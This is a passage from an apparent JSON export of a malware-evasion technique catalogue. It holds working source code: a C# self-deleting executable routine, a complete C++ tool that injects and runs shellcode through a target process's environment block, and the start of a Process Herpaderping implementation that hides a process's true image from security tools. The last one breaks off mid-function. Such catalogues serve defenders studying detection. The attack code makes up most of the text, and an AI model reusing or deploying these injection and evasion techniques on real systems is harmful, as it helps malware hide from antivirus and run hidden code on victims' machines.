!\");\r\n}\r\n\r\nConsole.WriteLine(\"No Debugger Detected :)\");"
        },
        {
            "id": 79,
            "language": {
                "id": 9,
                "label": "C#",
                "code_class": "csharp"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/167/?format=api",
            "description": "",
            "plain_code": "using System;\r\nusing System.Diagnostics;\r\n\r\nProcessStartInfo processInfo = new ProcessStartInfo();\r\n\r\nprocessInfo.CreateNoWindow = true;\r\nprocessInfo.FileName = \"cmd.exe\";\r\nprocessInfo.Arguments = String.Format(\r\n    \"/c for /l %i in (0) do ( timeout 1 && del \\\"{0}\\\" && IF NOT EXIST \\\"{0}\\\" (exit /b))\",\r\n    System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName\r\n);\r\nProcess.Start(processInfo);"
        },
        {
            "id": 75,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/178/?format=api",
            "description": "Author: @x86matthew",
            "plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define LOADER_CODE_OFFSET 8\r\n\r\nstruct PROCESS_BASIC_INFORMATION\r\n{\r\n\tDWORD ExitStatus;\r\n\tBYTE *PebBaseAddress;\r\n\tDWORD *AffinityMask;\r\n\tDWORD BasePriority;\r\n\tDWORD *UniqueProcessId;\r\n\tDWORD *InheritedFromUniqueProcessId;\r\n};\r\n\r\n#define ProcessBasicInformation 0\r\n\r\nDWORD (WINAPI *NtQueryInformationProcess)(HANDLE hProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, DWORD ProcessInformationLength, DWORD *ReturnLength);\r\nDWORD (WINAPI *NtCreateThreadEx)(HANDLE *phThreadHandle, DWORD DesiredAccess, PVOID ObjectAttributes, HANDLE hProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, DWORD *pZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);\r\n\r\nBYTE bGlobal_LoaderCode[] =\r\n{\r\n\t// prefix\r\n\t'A', 0x00, 'A', 0x00, 'A', 0x00, '=', 0x00,\r\n\r\n\t// push edi\r\n\t0x57,\r\n\t// push esi\r\n\t0x56,\r\n\r\n\t// push 0x40 (PAGE_EXECUTE_READWRITE)\r\n\t0x6A, 0x40,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_COMMIT | MEM_RESERVE)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualAlloc)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov edi, eax (DataAddr)\r\n\t0x8B, 0xF8,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (ProcessID)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (bInheritHandle)\r\n\t0x50,\r\n\t// push 0x10 (PROCESS_VM_READ)\r\n\t0x6A, 
0x10,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (OpenProcess)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov esi, eax (ProcessHandle)\r\n\t0x8B, 0xF0,\r\n\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (NumberOfBytesRead)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BytesToRead)\r\n\t0x50,\r\n\t// push edi (ReadBuffer)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (ReadProcessMemory)\r\n\t0xFF, 0xD0,\r\n\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (CloseHandle)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pushad\r\n\t0x60,\r\n\t// call edi (DataAddr)\r\n\t0xFF, 0xD7,\r\n\t// popad\r\n\t0x61,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_RELEASE)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// push edi (DataAddr)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualFree)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pop esi\r\n\t0x5E,\r\n\t// pop edi\r\n\t0x5F,\r\n\r\n\t// return from thread cleanly - can't use \"retn 4\"\r\n\t// pop eax\r\n\t0x58,\r\n\t// pop ecx\r\n\t0x59,\r\n\t// push eax\r\n\t0x50,\r\n\t// ret\r\n\t0xC3,\r\n\r\n\t// (end of string - 2 widechar null characters)\r\n\t0x00, 
0x00, 0x00, 0x00\r\n};\r\n\r\nDWORD EncodeDwordValue(DWORD dwValue, DWORD *pdwXorValue, DWORD *pdwEncodedValue)\r\n{\r\n\tBYTE bOrigValue[4];\r\n\tBYTE bXorValue[4];\r\n\tBYTE bEncodedValue[4];\r\n\r\n\t// copy original value\r\n\tmemcpy((void*)bOrigValue, (void*)&dwValue, sizeof(DWORD));\r\n\r\n\t// encode value\r\n\tfor(DWORD i = 0; i < sizeof(DWORD); i++)\r\n\t{\r\n\t\tbXorValue[i] = 0x01;\r\n\t\tfor(;;)\r\n\t\t{\r\n\t\t\t// ensure the value contains no 0x00 bytes\r\n\t\t\tbEncodedValue[i] = bOrigValue[i] ^ bXorValue[i];\r\n\t\t\tif(bEncodedValue[i] == 0 || bXorValue[i] == 0)\r\n\t\t\t{\r\n\t\t\t\tbXorValue[i]++;\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t// store values\r\n\t*pdwXorValue = *(DWORD*)bXorValue;\r\n\t*pdwEncodedValue = *(DWORD*)bEncodedValue;\r\n\r\n\treturn 0;\r\n}\r\n\r\nDWORD StartInjectedProcess(char *pExePath, BYTE *pPayload, DWORD dwPayloadSize)\r\n{\r\n\tSTARTUPINFO StartupInfo;\r\n\tPROCESS_INFORMATION ProcessInfo;\r\n\tBYTE bLoaderCode_Copy[sizeof(bGlobal_LoaderCode)];\r\n\tPROCESS_BASIC_INFORMATION ProcessBasicInfoData;\r\n\tBYTE *pRemotePtr_RtlUserProcessParameters = NULL;\r\n\tBYTE *pRemotePtr_EnvironmentStr = NULL;\r\n\tDWORD dwOriginalProtect = 0;\r\n\tHANDLE hThread = NULL;\r\n\tDWORD dwTempProtect = 0;\r\n\twchar_t *pOrigEnvBlock = NULL;\r\n\tDWORD dwOrigEnvBlockTotalLengthBytes = 0;\r\n\tDWORD dwCurrEnvEntryLength = 0;\r\n\twchar_t *pCurrEnvEntry = NULL;\r\n\tBYTE *pNewEnvBlock = NULL;\r\n\r\n\t// ensure the loader code is 16-bit aligned\r\n\tif((sizeof(bGlobal_LoaderCode) % 2) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Loader code is out of alignment\\n\");\r\n\t\t// loader code is out of alignment - add an extra 0x00 character to the end of the data\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Generating loader code...\\n\");\r\n\r\n\t// encode values in the loader code to ensure no 0x00 characters exist\r\n\tEncodeDwordValue(MEM_COMMIT | MEM_RESERVE, (DWORD*)&bGlobal_LoaderCode[13], 
(DWORD*)&bGlobal_LoaderCode[18]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[24], (DWORD*)&bGlobal_LoaderCode[29]);\r\n\tEncodeDwordValue((DWORD)VirtualAlloc, (DWORD*)&bGlobal_LoaderCode[38], (DWORD*)&bGlobal_LoaderCode[43]);\r\n\tEncodeDwordValue(GetCurrentProcessId(), (DWORD*)&bGlobal_LoaderCode[52], (DWORD*)&bGlobal_LoaderCode[57]);\r\n\tEncodeDwordValue((DWORD)OpenProcess, (DWORD*)&bGlobal_LoaderCode[68], (DWORD*)&bGlobal_LoaderCode[73]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[85], (DWORD*)&bGlobal_LoaderCode[90]);\r\n\tEncodeDwordValue((DWORD)pPayload, (DWORD*)&bGlobal_LoaderCode[97], (DWORD*)&bGlobal_LoaderCode[102]);\r\n\tEncodeDwordValue((DWORD)ReadProcessMemory, (DWORD*)&bGlobal_LoaderCode[109], (DWORD*)&bGlobal_LoaderCode[114]);\r\n\tEncodeDwordValue((DWORD)CloseHandle, (DWORD*)&bGlobal_LoaderCode[122], (DWORD*)&bGlobal_LoaderCode[127]);\r\n\tEncodeDwordValue(MEM_RELEASE, (DWORD*)&bGlobal_LoaderCode[138], (DWORD*)&bGlobal_LoaderCode[143]);\r\n\tEncodeDwordValue((DWORD)VirtualFree, (DWORD*)&bGlobal_LoaderCode[153], (DWORD*)&bGlobal_LoaderCode[158]);\r\n\r\n\tprintf(\"Appending code to existing environment string...\\n\");\r\n\r\n\t// get existing environment block\r\n\tpOrigEnvBlock = GetEnvironmentStringsW();\r\n\tif(pOrigEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read environment strings\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// calculate length of existing environment block\r\n\tfor(;;)\r\n\t{\r\n\t\t// get current environment string entry\r\n\t\tpCurrEnvEntry = (wchar_t*)((BYTE*)pOrigEnvBlock + dwOrigEnvBlockTotalLengthBytes);\r\n\r\n\t\t// calculate length\r\n\t\tdwCurrEnvEntryLength = wcslen(pCurrEnvEntry);\r\n\t\tif(dwCurrEnvEntryLength == 0)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t// increase total size counter\r\n\t\tdwOrigEnvBlockTotalLengthBytes += ((dwCurrEnvEntryLength + 1) * sizeof(wchar_t));\r\n\t}\r\n\r\n\t// allocate a new environment string buffer\r\n\tpNewEnvBlock = 
(BYTE*)VirtualAlloc(NULL, dwOrigEnvBlockTotalLengthBytes + sizeof(bGlobal_LoaderCode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\tif(pNewEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to allocate local memory\\n\");\r\n\r\n\t\t// error\r\n\t\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// copy the original values and append the loader code\r\n\tmemcpy((void*)pNewEnvBlock, pOrigEnvBlock, dwOrigEnvBlockTotalLengthBytes);\r\n\tmemcpy((void*)(pNewEnvBlock + dwOrigEnvBlockTotalLengthBytes), bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode));\r\n\r\n\t// free temporary environment string buffer\r\n\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\tprintf(\"Creating target process: '%s'...\\n\", pExePath);\r\n\r\n\t// launch target process with the injection code in the environment strings\t\r\n\tmemset(&StartupInfo, 0, sizeof(StartupInfo));\r\n\tStartupInfo.cb = sizeof(StartupInfo);\r\n\tif(CreateProcess(NULL, pExePath, NULL, NULL, 0, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED, (wchar_t*)pNewEnvBlock, NULL, &StartupInfo, &ProcessInfo) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to launch target process\\n\");\r\n\r\n\t\t// error\r\n\t\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// free environment block buffer\r\n\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\tprintf(\"Locating target code in remote process...\\n\");\r\n\r\n\t// get process info\r\n\tmemset((void*)&ProcessBasicInfoData, 0, sizeof(ProcessBasicInfoData));\r\n\tif(NtQueryInformationProcess(ProcessInfo.hProcess, ProcessBasicInformation, &ProcessBasicInfoData, sizeof(ProcessBasicInfoData), NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to retrieve process info\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// create a thread that calls Sleep(0) to 
initialise the environment strings in the PEB\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, Sleep, (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create Sleep thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// read RtlUserProcessParameters ptr from PEB\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(ProcessBasicInfoData.PebBaseAddress + 0x10), (void*)&pRemotePtr_RtlUserProcessParameters, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read RtlUserProcessParameters value from PEB\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// read EnvironmentStr ptr from RtlUserProcessParameters\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(pRemotePtr_RtlUserProcessParameters + 0x48), (void*)&pRemotePtr_EnvironmentStr, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read EnvironmentStr value from RtlUserProcessParameters\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// update environment string ptr to ignore the original bytes\r\n\tpRemotePtr_EnvironmentStr += dwOrigEnvBlockTotalLengthBytes;\r\n\r\n\t// read EnvironmentStr value\r\n\tmemset(bLoaderCode_Copy, 0, sizeof(bLoaderCode_Copy));\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)pRemotePtr_EnvironmentStr, (void*)bLoaderCode_Copy, sizeof(bGlobal_LoaderCode), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read loader data from EnvironmentStr\\n\");\r\n\r\n\t\t// 
error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// ensure the loader code has been copied correctly\r\n\tif(memcmp(bLoaderCode_Copy, bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode)) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Invalid loader data\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Executing code in remote process...\\n\");\r\n\r\n\t// temporarily make the loader code executable\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), PAGE_EXECUTE_READWRITE, &dwOriginalProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// execute payload\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, (BYTE*)(pRemotePtr_EnvironmentStr + LOADER_CODE_OFFSET), (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create code loader thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// restore original protection value\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), dwOriginalProtect, &dwTempProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 
0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// resume main thread\r\n\tResumeThread(ProcessInfo.hThread);\r\n\r\n\t// close handles\r\n\tCloseHandle(ProcessInfo.hThread);\r\n\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tchar *pExePath = NULL;\r\n\r\n\tBYTE bPayload[] =\r\n\t{\r\n\t\t// string: <user32.dll>\r\n\t\t// push 0x00006C6C\r\n\t\t0x68, 0x6C, 0x6C, 0x00, 0x00,\r\n\t\t// push 0x642E3233\r\n\t\t0x68, 0x33, 0x32, 0x2E, 0x64,\r\n\t\t// push 0x72657375\r\n\t\t0x68, 0x75, 0x73, 0x65, 0x72,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// push ecx (ModuleName)\r\n\t\t0x51,\r\n\t\t// mov eax, LoadLibraryA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t // string: <Code injected successfully!>\r\n\t\t// push 0x0021796C\r\n\t\t0x68, 0x6C, 0x79, 0x21, 0x00,\r\n\t\t// push 0x6C756673\r\n\t\t0x68, 0x73, 0x66, 0x75, 0x6C,\r\n\t\t// push 0x73656363\r\n\t\t0x68, 0x63, 0x63, 0x65, 0x73,\r\n\t\t// push 0x75732064\r\n\t\t0x68, 0x64, 0x20, 0x73, 0x75,\r\n\t\t// push 0x65746365\r\n\t\t0x68, 0x65, 0x63, 0x74, 0x65,\r\n\t\t// push 0x6A6E6920\r\n\t\t0x68, 0x20, 0x69, 0x6E, 0x6A,\r\n\t\t// push 0x65646F43\r\n\t\t0x68, 0x43, 0x6F, 0x64, 0x65,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// string: <www.x86matthew.com>\r\n\t\t// push 0x00006D6F\r\n\t\t0x68, 0x6F, 0x6D, 0x00, 0x00,\r\n\t\t// push 0x632E7765\r\n\t\t0x68, 0x65, 0x77, 0x2E, 0x63,\r\n\t\t// push 0x68747461\r\n\t\t0x68, 0x61, 0x74, 0x74, 0x68,\r\n\t\t// push 0x6D363878\r\n\t\t0x68, 0x78, 0x38, 0x36, 0x6D,\r\n\t\t// push 0x2E777777\r\n\t\t0x68, 0x77, 0x77, 0x77, 0x2E,\r\n\t\t// mov ebx, esp\r\n\t\t0x8B, 0xDC,\r\n\t\t// push MB_OK\r\n\t\t0x6A, 0x00,\r\n\t\t// push ebx (Caption)\r\n\t\t0x53,\r\n\t\t// push ecx (Text)\r\n\t\t0x51,\r\n\t\t// push hWnd\r\n\t\t0x6A, 0x00,\r\n\t\t// mov eax, MessageBoxA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 
0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t// add esp, 0x3C\r\n\t\t0x83, 0xC4, 0x3C,\r\n\r\n\t\t// ret\r\n\t\t0xC3\r\n\t};\r\n\r\n\t// set function addresses\r\n\t*(DWORD*)&bPayload[19] = (DWORD)LoadLibraryA;\r\n\t*(DWORD*)&bPayload[96] = (DWORD)MessageBoxA;\r\n\r\n\tprintf(\"ProcEnvInjection - www.x86matthew.com\\n\\n\");\r\n\r\n\t// check params\r\n\tif(argc != 2)\r\n\t{\r\n\t\tprintf(\"Usage: %s [exe_path]\\n\\n\", argv[0]);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get cmd param\r\n\tpExePath = argv[1];\r\n\t\r\n\t// get NtQueryInformationProcess function\r\n\tNtQueryInformationProcess = (unsigned long (__stdcall *)(void *,unsigned long,void *,unsigned long,unsigned long *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryInformationProcess\");\r\n\tif(NtQueryInformationProcess == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get NtCreateThreadEx function\r\n\tNtCreateThreadEx = (unsigned long (__stdcall *)(void ** ,unsigned long,void *,void *,void *,void *,unsigned long,unsigned long *,unsigned long,unsigned long,void *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtCreateThreadEx\");\r\n\tif(NtCreateThreadEx == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// start target process\r\n\tif(StartInjectedProcess(pExePath, bPayload, sizeof(bPayload)) != 0)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Injected successfully\\n\");\r\n\r\n\treturn 0;\r\n}"
        },
        {
            "id": 74,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/170/?format=api",
            "description": "",
            "plain_code": "//\r\n// Copyright (c) Johnny Shaw. All rights reserved.\r\n// \r\n// File:     source/ProcessHerpaderping/herpaderp.cpp\r\n// Author:   Johnny Shaw\r\n// Abstract: Herpaderping Functionality\r\n//\r\n#include \"pch.hpp\"\r\n#include \"herpaderp.hpp\"\r\n#include \"utils.hpp\"\r\n\r\n_Use_decl_annotations_\r\nHRESULT Herpaderp::ExecuteProcess(\r\n    const std::wstring& SourceFileName,\r\n    const std::wstring& TargetFileName,\r\n    const std::optional<std::wstring>& ReplaceWithFileName,\r\n    std::span<const uint8_t> Pattern, \r\n    uint32_t Flags)\r\n{\r\n    if (FlagOn(Flags, FlagHoldHandleExclusive) && \r\n        FlagOn(Flags, FlagCloseFileEarly))\r\n    {\r\n        //\r\n        // Incompatible flags.\r\n        //\r\n        return E_INVALIDARG;\r\n    }\r\n\r\n    if (FlagOn(Flags, FlagWaitForProcess) &&\r\n        FlagOn(Flags, FlagKillSpawnedProcess))\r\n    {\r\n        //\r\n        // Incompatible flags.\r\n        //\r\n        return E_INVALIDARG;\r\n    }\r\n\r\n    wil::unique_handle processHandle;\r\n    //\r\n    // If something goes wrong, we'll terminate the process.\r\n    //\r\n    auto terminateProcess = wil::scope_exit([&processHandle]() -> void\r\n    {\r\n        if (processHandle.is_valid())\r\n        {\r\n            TerminateProcess(processHandle.get(), 0);\r\n        }\r\n    });\r\n\r\n    Utils::Log(Log::Success, L\"Source File: \\\"%ls\\\"\", SourceFileName.c_str());\r\n    Utils::Log(Log::Success, L\"Target File: \\\"%ls\\\"\", TargetFileName.c_str());\r\n\r\n    //\r\n    // Open the source binary and the target file we will execute it from.\r\n    //\r\n    wil::unique_handle sourceHandle;\r\n    sourceHandle.reset(CreateFileW(SourceFileName.c_str(),\r\n                                   GENERIC_READ,\r\n                                   FILE_SHARE_READ | \r\n                                       FILE_SHARE_WRITE | \r\n                                       FILE_SHARE_DELETE,\r\n                
                   nullptr,\r\n                                   OPEN_EXISTING,\r\n                                   FILE_ATTRIBUTE_NORMAL,\r\n                                   nullptr));\r\n    if (!sourceHandle.is_valid())\r\n    {\r\n        RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n                                         GetLastError(), \r\n                                         L\"Failed to open source file\"));\r\n    }\r\n\r\n    std::wstring targetFileName = TargetFileName;\r\n    if (FlagOn(Flags, FlagDirectory))\r\n    {\r\n        Utils::Log(Log::Information, \r\n                   L\"Targeting Directory: \\\"%ls\\\"\", \r\n                   targetFileName.c_str());\r\n\r\n        wil::unique_handle dirHandle;\r\n        if (CreateDirectoryW(targetFileName.c_str(), nullptr) == FALSE)\r\n        {\r\n            RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n                                             GetLastError(), \r\n                                             L\"Failed to create directory\"));\r\n        }\r\n\r\n        targetFileName += L\":exe\";\r\n\r\n        Utils::Log(Log::Information, \r\n                   L\"Using Directory Stream: \\\"%ls\\\"\", \r\n                   targetFileName.c_str());\r\n    }\r\n\r\n    DWORD shareMode = (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE);\r\n    if (FlagOn(Flags, FlagHoldHandleExclusive))\r\n    {\r\n        Utils::Log(Log::Information, \r\n                   L\"Creating target file with exclusive access\");\r\n        shareMode = 0;\r\n    }\r\n\r\n    wil::unique_handle targetHandle;\r\n    targetHandle.reset(CreateFileW(targetFileName.c_str(),\r\n                                   GENERIC_READ | GENERIC_WRITE,\r\n                                   shareMode,\r\n                                   nullptr,\r\n                                   CREATE_ALWAYS,\r\n                                   FILE_ATTRIBUTE_NORMAL,\r\n                                   nullptr));\r\n    
if(!targetHandle.is_valid())\r\n    {\r\n        RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n                                         GetLastError(), \r\n                                         L\"Failed to create target file\"));\r\n    }\r\n\r\n    //\r\n    // Copy the content of the source process to the target.\r\n    //\r\n    HRESULT hr = Utils::CopyFileByHandle(sourceHandle.get(),\r\n                                         targetHandle.get());\r\n    if (FAILED(hr))\r\n    {\r\n        Utils::Log(Log::Error,\r\n                   hr,\r\n                   L\"Failed to copy source binary to target file\");\r\n        RETURN_HR(hr);\r\n    }\r\n\r\n    Utils::Log(Log::Information, L\"Copied source binary to target file\");\r\n\r\n    //\r\n    // We're done with the source binary.\r\n    //\r\n    sourceHandle.reset();\r\n\r\n    //\r\n    // Map and create the target process. We'll make it all derpy in a moment...\r\n    //\r\n    wil::unique_handle sectionHandle;\r\n    auto status = NtCreateSection(&sectionHandle,\r\n                                  SECTION_ALL_ACCESS,\r\n                                  nullptr,\r\n                                  nullptr,\r\n                                  PAGE_READONLY,\r\n                                  SEC_IMAGE,\r\n                                  targetHandle.get());\r\n    if (!NT_SUCCESS(status))\r\n    {\r\n        sectionHandle.release();\r\n        RETURN_NTSTATUS(Utils::Log(\r\n                              Log::Error, \r\n                              status, \r\n                              L\"Failed to create target file image section\"));\r\n    